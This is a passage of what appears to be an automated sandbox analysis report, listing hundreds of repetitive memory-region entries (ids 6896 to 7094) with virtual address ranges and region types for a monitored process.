start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6896 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6897 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6898 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6899 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6900 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6901 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6902 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6903 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6904 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6905 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6906 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6907 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6908 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6909 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6910 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6911 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6912 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6913 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6914 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6915 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6916 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6917 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6918 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6919 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6920 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6921 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6922 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6923 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6924 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6925 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6926 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6927 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6928 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6929 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6930 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6931 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6932 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6933 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6934 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6935 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6936 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6937 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6938 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6939 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6940 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6941 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6942 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6943 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6944 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6945 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6946 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6947 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6948 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6949 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6950 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6951 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6952 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6953 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6954 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6955 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6956 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6957 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6958 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6959 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6960 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6961 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6962 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6963 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6964 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6965 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6966 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6967 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6968 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6969 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6970 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6971 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6972 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6973 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6974 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6975 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6976 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6977 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6978 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6979 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6980 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6981 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6982 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6983 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6984 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6985 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6986 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6987 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6988 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6989 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6990 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6991 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6992 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6993 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6994 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6995 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6996 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 6997 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 6998 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 6999 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7000 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7001 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7002 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7003 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7004 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7005 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7006 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7007 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7008 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7009 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7010 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7011 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7012 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7013 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7014 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7015 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7016 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7017 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7018 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7019 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7020 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7021 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7022 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7023 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7024 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7025 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7026 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7027 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7028 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7029 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7030 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7031 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7032 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7033 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7034 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7035 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7036 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7037 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7038 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7039 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7040 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7041 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7042 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7043 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7044 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7045 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7046 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7047 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7048 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7049 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7050 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7051 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7052 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7053 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7054 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7055 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7056 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7057 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7058 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7059 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7060 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7061 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7062 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7063 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7064 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7065 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7066 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7067 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7068 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7069 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7070 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7071 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7072 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7073 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7074 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7075 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7076 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7077 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7078 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7079 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7080 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7081 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7082 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7083 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7084 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7085 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7086 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7087 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7088 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7089 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7090 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7091 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 7092 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7093 start_va = 0x2240000 end_va = 0x225bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 7094 start_va = 0x400000 end_va = 0x40efff monitored = 1 